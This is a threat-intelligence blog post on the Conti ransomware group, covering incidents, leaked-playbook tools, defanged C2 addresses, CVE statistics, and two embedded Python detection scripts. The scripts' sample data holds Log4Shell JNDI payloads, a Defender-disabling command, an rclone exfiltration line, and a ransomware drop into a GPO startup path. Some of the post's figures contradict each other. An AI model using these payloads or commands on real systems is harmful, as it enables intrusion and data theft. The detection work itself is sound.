
All About Conti

Posted on Feb 23, 2022 | Updated on May 12, 2022 | By Surojoy Gupta

Conti has been in the news consistently since August 2021, warranting a joint advisory from the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the National Security Agency (NSA) that alerted organizations to the threat posed by the ransomware group and to the vulnerabilities it exploits.

A risk-based approach is what the moment demands if organizations want to stay ahead of sophisticated and dangerous ransomware groups such as Conti.

 


Recent Developments

Costa Rica Declares National Emergency: Costa Rican President Rodrigo Chaves declared a national emergency following cyber attacks by the Conti ransomware group on multiple government bodies. Conti published 672 GB of data taken from Costa Rican government entities last month. The Conti actor tracked as UNC1756, together with an affiliate, claimed sole responsibility for the attack, ruling out nation-state hackers.

ContiLeaks: A new Twitter account named ContiLeaks posted links to an archive of Conti's internal chat messages on February 27, shortly after the ransomware group offered support to Russia in its war against Ukraine. The leaked data also included domains used in compromises involving BazarBackdoor, the malware used to gain access to targeted networks. In addition, DHS CISA updated its Conti ransomware advisory with indicators of compromise (IoCs) covering over 100 domain names used in criminal operations.

The leaked internal chats reveal the inner workings of the group, including details on 30 vulnerabilities exploited by Conti and its affiliates, which brings the total number of CVEs associated with the ransomware to 44, along with specific insights into its post-compromise processes, such as how it targets Active Directory.

 

In this blog, CSW's data researchers and security analysts cover the latest developments, the tools, techniques, and procedures used, and the vulnerabilities exploited by Conti in 2021-22.


Who is Conti?


Conti is a ransomware-as-a-service (RaaS) operation believed to be run by the Russia-based cybercrime group Wizard Spider. The ransomware shares some of its code with the infamous Ryuk ransomware, which faded from the headlines around July 2020.

 

Conti-nuous Attacks Through January 2022


Conti’s prolific track record continues into 2022, with four attacks reported within the first two months of the year. The table below lists recent incidents involving the Conti group, most recent first.
 

Ransomware Attack Incident | Time Period | Sector | Ransom Demand / Data Stolen
Costa Rica | April 22, 2022 | Finance | -
Panasonic Canada | April 15, 2022 | HR and accounting | -
TrustFord | April 8, 2022 | Manufacturing | -
Wind Turbine | March 21, 2022 | IT | -
Meyer Corporation | October 25, 2021 - February 18, 2022 | Distribution | -
Kenyon Produce Snacks | February 02, 2022 | Foods and Beverages | -
Delta Electronics | January 21, 2022 | Manufacturing | $15 million ransom
RR Donnelley | January 15, 2022 | Marketing Agency | 2.5 GB data stolen
Bank of Indonesia | December 2021 - January 2022 | Banking | 13.88 GB data stolen; ransom amount unknown
Finite Recruitment | December 2021 | Government | 300 GB data stolen
McMenamins Brewery | December 12, 2021 | Foods and Beverages | -
Nordic Choice Hotels | December 2, 2021 | Hospitality | -
Shutterfly | December 2021 | E-commerce | A few million dollars in ransom
CS Energy | November 27, 2021 | Energy | -
Australian Government | November 2021 - present | Government | -
Graff | October 2021 | Jewelry | 69,000 files leaked
JVC Kenwood | September - October 2021 | Manufacturing | 1.7 TB data stolen; $7 million ransom
Covisian | September 18, 2021 | Communications Industry | -
Microsoft Exchange Servers using ProxyShell | September 3, 2021 | Software | 1 TB data stolen
SAC Wireless (Nokia subsidiary) | June - August 2021 | Manufacturing | 250 GB data stolen
Stanadyne PurePower Technologies | June 2, 2021 - present | Engineering and Technology | -
Canada (unnamed organization) | Till June 2021 | Insurance | -
Canada (unnamed organization) | Till June 2021 | Engineering and Technology | -
Canada (unnamed organization) | Till June 2021 | Internet services | -
New Zealand Health Department | May 21, 2021 - present | Healthcare | -
Ireland Department of Health | May 18, 2021 - present | Healthcare | Attempt unsuccessful
Ireland Health Service Executive (HSE) | May 17, 2021 - present | Healthcare | $20 million
City of Tulsa | May 6, 2021 - present | Government | -
ExaGrid | May 4, 2021 | IT | $2.6 million
Broward County Public Schools, Florida | March - April 2021 | Education | $40 million

 

Conti’s ‘Playbook’ Leak


In August 2021, a disgruntled Conti affiliate released the threat actor’s ‘playbook’, which listed the group's tactics, techniques, and procedures as well as the vulnerabilities it commonly exploits.


Some of the vulnerabilities mentioned in the technical manual were the 2017 Microsoft Windows SMB 1.0 server vulnerabilities (MS17-010, exploited by EternalBlue), CVE-2021-34527 in the Windows Print Spooler service (PrintNightmare), and CVE-2020-1472 in the Netlogon protocol on Active Directory domain controllers, better known as Zerologon.


The artifact also identified four Cobalt Strike server Internet Protocol (IP) addresses used by Conti actors to communicate with their command and control (C2) infrastructure. The FBI and CISA also observed that Conti actors use different Cobalt Strike server IP addresses for different victims. The addresses are listed defanged, with the last dot bracketed so they cannot be clicked by accident:

  • 162.244.80[.]235

  • 85.93.88[.]165

  • 185.141.63[.]120

  • 82.118.21[.]1


Here are some of the tools and command-line utilities routinely used by the Conti gang, as documented in the playbook leaked by the disgruntled affiliate:

 

Tool or Command-line Utility | Purpose Served
Cobalt Strike beacon | Provides backdoor access to compromised systems and the C2 channel
ATERA Agent | Legitimate remote monitoring and management agent installed for persistence in an infected network
Ngrok | Tunnels a local port (for example RDP) out to a public ngrok endpoint, giving the actor a way back into the host and a channel for data exfiltration
Rclone | Exfiltrates data from infected systems and backups to cloud storage
Armitage | GUI front end for Metasploit, used to identify targets and exploits and for post-exploitation
SharpView | .NET port of PowerView from the PowerShell-based PowerSploit offensive toolkit, used for Active Directory enumeration
SharpChrome | Decrypts saved logins and cookies from Google Chrome
Seatbelt | Collects host data such as OS version, UAC policy, and user folders
AdFind | Active Directory query tool
PowerShell | Used to disable Windows Defender (for example via Set-MpPreference)
SMBAutoBrute | Brute-forces account passwords over SMB within the current domain
Kerberoasting | Requests Kerberos service tickets for accounts with SPNs and cracks them offline to recover the service accounts' passwords
Mimikatz | Dumps passwords and hashes from memory
GMER | Rootkit detector repurposed to identify and disable security solutions
RouterScan | Discovers devices on the network and extracts their passwords using exploits or brute force
AnyDesk | Remote-access tool installed for persistence

 

Conti Leverages Log4Shell


After the critical Log4Shell vulnerability (CVE-2021-44228) in Apache Log4j was disclosed in December 2021, threat actors including Conti began exploiting it while organizations scrambled to patch their systems.


Not long after our researchers observed Conti exploiting Log4Shell, VMware vCenter Server instances were being compromised through it. Approximately 40 VMware products were found vulnerable to the Log4j bug, and where the vendor's fixes had not been applied, Conti used the vulnerability to move laterally through unpatched servers. The compromise of VMware infrastructure led to the ransomware attack on Shutterfly, a photography giant, which affected 4,000 devices and 120 VMware ESXi servers.


In due course, Conti also became the first ransomware group known to have a complete exploit chain for Log4Shell, raising concerns among cybersecurity professionals worldwide about a wave of supply-chain attacks by Conti leveraging the critical Apache bug.
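One way to hunt for Log4Shell probes of the kind described above in web server or vCenter access logs, as an added example that is not part of the original post nor any CSW or Conti tooling: attackers wrapped the `${jndi:...}` lookup in nested single-character Log4j lookups (`${lower:j}`, `${::-j}`) and URL-encoding to evade naive greps, so the normaliser below unwinds those layers first and then reports the lookup scheme and callback host the vulnerable logger would have contacted. The log lines are constructed for the example; the IPs and hostname in them are documentation ranges, not real indicators.

```python
"""Log4Shell (CVE-2021-44228) probe hunting over access-log lines.

Added example; not code from the original post or from any Conti tooling.
Attackers obfuscated the ${jndi:...} lookup with nested single-character
lookups, so naive greps missed them.  normalize() collapses those layers
first, then find_jndi() reports what the vulnerable logger would resolve.
"""
import re
from typing import List, Tuple
from urllib.parse import unquote

# Single-character lookups that vulnerable Log4j 2.x resolves to one char:
#   ${lower:J} / ${upper:j} -> j        ${::-j} / ${env:NOPE:-j} -> j
# Bodies may not contain braces, so only the innermost layer matches per
# pass and nests like ${${lower:l}ower:j} are unwound iteratively.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}])\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*:-([^{}])\}")

# After normalisation the real lookup is visible; capture scheme and host.
_JNDI = re.compile(
    r"\$\{jndi:(ldaps?|rmi|dns|iiop|corba|nds|https?)://([^/}\s]+)",
    re.IGNORECASE)


def normalize(text: str, max_passes: int = 10) -> str:
    """URL-decode, then strip single-char lookup obfuscation innermost-first."""
    text = unquote(text)
    for _ in range(max_passes):
        unwound = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        unwound = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), unwound)
        if unwound == text:
            break
        text = unwound
    return text.lower()


def find_jndi(text: str) -> List[Tuple[str, str]]:
    """Return (scheme, callback host[:port]) for every JNDI lookup in text."""
    return _JNDI.findall(normalize(text))


def scan(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Scan log lines; return (1-based line number, scheme, host) per hit."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for scheme, host in find_jndi(line):
            hits.append((number, scheme, host))
    return hits


# Constructed sample log lines (not real traffic); 1-4 are probes, 5-6 benign.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Dec/2021:03:14:07 +0000] "GET /ui/login HTTP/1.1" 200 512 '
    '"-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.5 - - [11/Dec/2021:03:14:09 +0000] "GET /ui/login HTTP/1.1" 200 512 '
    '"-" "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://203.0.113.9/x}"',
    '10.0.0.6 - - [11/Dec/2021:03:15:01 +0000] "GET / HTTP/1.1" 200 88 '
    '"-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.10:1099/obj}"',
    '10.0.0.7 - - [11/Dec/2021:03:16:40 +0000] '
    '"GET /?x=%24%7Bjndi%3Adns%3A%2F%2Fevil.example%2Fz%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.8 - - [11/Dec/2021:03:17:12 +0000] "GET /ui/ HTTP/1.1" 200 9000 '
    '"-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '10.0.0.9 - - [11/Dec/2021:03:18:00 +0000] "GET /api?tpl=${user.name} HTTP/1.1" 200 12 '
    '"-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("line %d: %s callback to %s" % hit)
```

Run it against your own access logs by feeding `scan()` the lines; the callback hosts it returns are the addresses to block and to search for in outbound connection logs, since a vulnerable host that resolved the lookup will have reached out to them. The normaliser is deliberately bounded to ten passes so a pathological line cannot make it loop.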

 

Interesting Trends

Some interesting trends pertaining to the Conti ransomware group have been observed over the last year. Here is a brief overview.


1. Conti Swears Allegiance to the Russian Government

As the Russian invasion of Ukraine commenced, the Conti ransomware gang issued a statement to its adversaries in the West, not only pledging allegiance to the war efforts carried out by the Russian government, but also warning of retaliatory attacks on critical infrastructure if any nation were to oppose the war or plan cyberattacks against Russia. 

A printscreen of the Conti warning message posted by the gang members.



Shortly after releasing the message, Conti revised it to soften its tone and its support for the Russian government. The updated warning states that Conti ‘does not ally with any governments’ and that they ‘condemn the ongoing war’.

A printscreen of the revised Conti warning message posted by the gang members.



2. Taking over TrickBot malware operations

The Conti ransomware syndicate took over the failing TrickBot malware operation in mid-February 2022. Since TrickBot is now widely detected by antivirus products, the Conti gang aims to replace it with the stealthier BazarBackdoor malware, which is already in use to compromise high-value targets.


3. SEO Poisoning attacks

On February 07, 2022, hackers running an SEO poisoning campaign were spotted using tools such as the ATERA agent, BATLOADER malware, and Ursnif, with techniques very similar to those used by the Conti group. The hackers were attempting to infiltrate organizations through trojanized installers posing as Microsoft Visual Studio 2015, Zoom, and TeamViewer, among others.


4. Novel approach to destroy backups

Soon after the Ireland Health Service attack, in June 2021, Conti focused its attention on developing new ways to compromise the Veeam backup software used for disaster recovery. The Conti gang uses three tools (Cobalt Strike, Atera, and Ngrok) during its infection routine and subsequently impersonates a privileged backup user to grant itself Veeam backup privileges, which it then uses to destroy all backups.
 

5.  Apology for Attack

The Conti ransomware gang leaked thousands of records stolen from the UK-based jeweler Graff during its October 2021 attack. However, in November 2021, the hackers issued a surprising apology for their decision to leak data that included files on prominent public figures, such as the crown prince of Saudi Arabia.
 

6. Wizard Spider Partners with Shatak APT

It has been noted that the threat group ITG23 (the TrickBot gang, Wizard Spider) has been partnering with the threat group TA551 (Shatak) to distribute the TrickBot and BazarBackdoor malware that is then used to deploy Conti ransomware on compromised systems.

Shatak distributes malware by email through phishing. Researchers assess that the Conti gang may be relying on Shatak for initial access.


7.  Selling Access to Victims

The Conti ransomware affiliate program appears to have altered its tactics: for organizations that refuse to pay or negotiate a ransom, the gang now offers access to the stolen data for sale to interested parties before the confidential files are published on its victim-shaming blog.


8. Revival of Emotet Botnet

After law enforcement took down the Emotet botnet in early 2021, the Conti gang seems to have convinced some members of the botnet's team to revive it. Historically one of the most widespread malware families, Emotet can wreak havoc as it has in the past, deploying Ryuk, Conti, ProLock, Egregor, DoppelPaymer, and other ransomware on exposed systems.

 

Conti Vulnerabilities

We analyzed the CVEs exploited by the Conti group. Here is our detailed analysis:

 

  • Of the 44 vulnerabilities, three have CVSS v3 scores of 10.

  • 23 of the 44 vulnerabilities allow remote code execution or privilege escalation.

  • Seven of the 44 vulnerabilities can be used for denial of service.

  • Eight vulnerabilities are categorized as web application exploits; the remainder are uncategorized.

  • 12 vulnerabilities carry critical severity ratings (9.8 to 10), 30 carry high severity ratings (7.2 to 8.1), and one carries a medium severity rating (5.9).

  • Six vulnerabilities are categorized as improper input validation issues (CWE-20), while eight carry the weakness enumeration CWE-269 (Improper Privilege Management).

 

Conti Attack Methodology


Looking at multiple attacks involving Conti ransomware, we understand their overall attack flow to be the following:
 

  1. Initial Attack Vectors:

  • Social engineering (phishing)

  • Vulnerable firewalls

  • Internet-facing RDP servers
     

  2. Privilege Escalation:

  • Gain domain administrator privileges or equivalent

  • Disable security measures

  3. Execution:

  • Target servers, endpoints, backups, and sensitive data

  • Gather live IP addresses and open ports

  • Dump credentials

  • Install backdoors and deploy C2 (for example, a Cobalt Strike beacon)

  • Exfiltrate as much data as possible

  • Launch the ransomware, using RCE vulnerabilities to distribute it to all identified servers

  • Inject it into GPO logon scripts so it runs whenever a computer starts up and joins the domain
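To turn the methodology above, the tool list from the playbook, and the four leaked Cobalt Strike C2 addresses into something a SOC can actually run, here is an added detection example; it is not code from this post, from CSW, or from the CISA advisory. It assumes a simplified, hypothetical event model (dicts with a 'type' of 'process', 'network' or 'kerberos_tgs') that you would map from Sysmon or EDR telemetry, and the sample events are constructed. It flags Defender tampering via PowerShell, Rclone/Ngrok exfiltration tooling, AnyDesk/Atera persistence, AdFind reconnaissance, Mimikatz, connections to the listed C2 IPs, a payload dropped into a GPO logon or startup script path, and Kerberoasting (one account requesting RC4 service tickets for many distinct SPNs).

```python
"""Triage constructed Windows telemetry for the Conti tradecraft on this page.

Added example; not code from the post, from CSW, or from the CISA advisory.
The event model is hypothetical and deliberately minimal: dicts with a
'type' of 'process', 'network' or 'kerberos_tgs'.  Map Sysmon/EDR fields
onto it before use.  The C2 addresses are the four leaked Cobalt Strike IPs.
"""
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple

Event = Dict[str, str]
Finding = Tuple[str, str, str]  # (rule, host or account, detail)

# Cobalt Strike server IPs from the playbook leak, defanged as published
# and refanged here for matching against connection telemetry.
CONTI_C2_DEFANGED = ["162.244.80[.]235", "85.93.88[.]165",
                     "185.141.63[.]120", "82.118.21[.]1"]
CONTI_C2: Set[str] = {ip.replace("[.]", ".") for ip in CONTI_C2_DEFANGED}

# Command-line patterns for the steps and tools the page describes.
PROCESS_RULES = [
    ("defender_tamper",
     re.compile(r"Set-MpPreference\s+-Disable\w+|DisableAntiSpyware", re.I)),
    ("exfil_tool", re.compile(r"\b(?:rclone|ngrok)(?:\.exe)?\b", re.I)),
    ("remote_access_persistence",
     re.compile(r"\b(?:AnyDesk|AteraAgent)(?:\.exe)?\b", re.I)),
    ("ad_recon", re.compile(r"\badfind(?:\.exe)?\b", re.I)),
    ("cred_dump", re.compile(r"sekurlsa::|\bmimikatz\b", re.I)),
    # Ransomware staged via a GPO logon/startup script, as in the last step.
    ("gpo_script_drop",
     re.compile(r"\\SYSVOL\\.*\\Scripts\\(?:Logon|Startup)\\", re.I)),
]

# Kerberoasting: one account requesting RC4-HMAC (etype 0x17) service
# tickets for many distinct SPNs within the window under review.
KERBEROAST_MIN_SERVICES = 5


def triage(events: List[Event]) -> List[Finding]:
    """Return findings in event order; Kerberoasting findings come last."""
    findings: List[Finding] = []
    rc4_spns: Dict[str, Set[str]] = defaultdict(set)
    for ev in events:
        kind = ev.get("type")
        if kind == "process":
            cmd = ev.get("cmdline", "")
            for rule, pattern in PROCESS_RULES:
                if pattern.search(cmd):
                    findings.append((rule, ev["host"], cmd[:60]))
        elif kind == "network":
            if ev.get("dst_ip") in CONTI_C2:
                findings.append(("cobalt_strike_c2", ev["host"],
                                 "%s:%s" % (ev["dst_ip"], ev.get("dst_port", "?"))))
        elif kind == "kerberos_tgs" and ev.get("etype", "").lower() == "0x17":
            rc4_spns[ev["account"]].add(ev["service"])
    for account, spns in sorted(rc4_spns.items()):
        if len(spns) >= KERBEROAST_MIN_SERVICES:
            findings.append(("kerberoasting", account,
                             "%d RC4 service tickets" % len(spns)))
    return findings


# Constructed sample telemetry (not from a real incident).
SAMPLE_EVENTS: List[Event] = [
    {"type": "process", "host": "WS01",
     "cmdline": "powershell.exe -nop Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"type": "process", "host": "WS01",
     "cmdline": "adfind.exe -f objectcategory=computer -csv"},
    {"type": "network", "host": "WS01", "dst_ip": "185.141.63.120", "dst_port": "443"},
    {"type": "network", "host": "WS01", "dst_ip": "93.184.216.34", "dst_port": "443"},
    {"type": "process", "host": "FS02",
     "cmdline": r"rclone.exe copy D:\Finance mega:dump --transfers 8"},
    {"type": "process", "host": "DC01",
     "cmdline": r"cmd.exe /c copy C:\Users\Public\locker.exe "
                r"\\corp.example\SYSVOL\corp.example\Policies"
                r"\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Scripts\Startup\locker.exe"},
    {"type": "process", "host": "WS07", "cmdline": r"notepad.exe C:\Users\amy\notes.txt"},
] + [
    {"type": "kerberos_tgs", "account": "svc_scanner", "etype": "0x17",
     "service": "MSSQLSvc/db%02d.corp.example" % i} for i in range(6)
] + [
    {"type": "kerberos_tgs", "account": "amy", "etype": "0x12",
     "service": "HTTP/intranet.corp.example"},
]

if __name__ == "__main__":
    for rule, where, detail in triage(SAMPLE_EVENTS):
        print("%-26s %-12s %s" % (rule, where, detail))
```

Two design points worth noting: the C2 match is on exact destination address, so it will go quiet as soon as Conti rotates servers (CISA notes different addresses per victim), which is why the behavioural rules around it matter more than the IP list; and the Kerberoasting rule keys on RC4 ticket requests rather than on any tool name, because the request itself is legitimate protocol traffic and only the volume and the encryption downgrade give the attacker away.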


Conti Attack MITRE Map

Indicators of Compromise (IoCs)

 

What does the future hold? 

 
In November 2021, the Department of Homeland Security's CISA launched its Known Exploited Vulnerabilities (KEV) catalog, which contained 383 vulnerabilities as of February 2022. Of these 383 vulnerabilities, seventeen have been associated with the Conti gang.


Of the seventeen vulnerabilities exploited by Conti ransomware, eleven are part of CISA's Known Exploited Vulnerabilities catalog and should be patched immediately.


As highlighted in CSW’s Ransomware Spotlight Report 2022, vulnerabilities that were discovered in 2020 and earlier accounted for 91% of the total vulnerability count (288) as of December 2021. This emphasizes the need for periodic vulnerability management and patching to maintain good cyber hygiene.

Companies ought to seek out more effective approaches towards vulnerability management by adopting vulnerability assessment platforms that can present threat data in real-time, as well as identify, investigate and categorize vulnerabilities based on their weaponization.

Aaron Sandeen, CEO of CSW 

Adopting a risk-based approach and prioritizing critical vulnerabilities based on threat context is the need of the hour. 

 
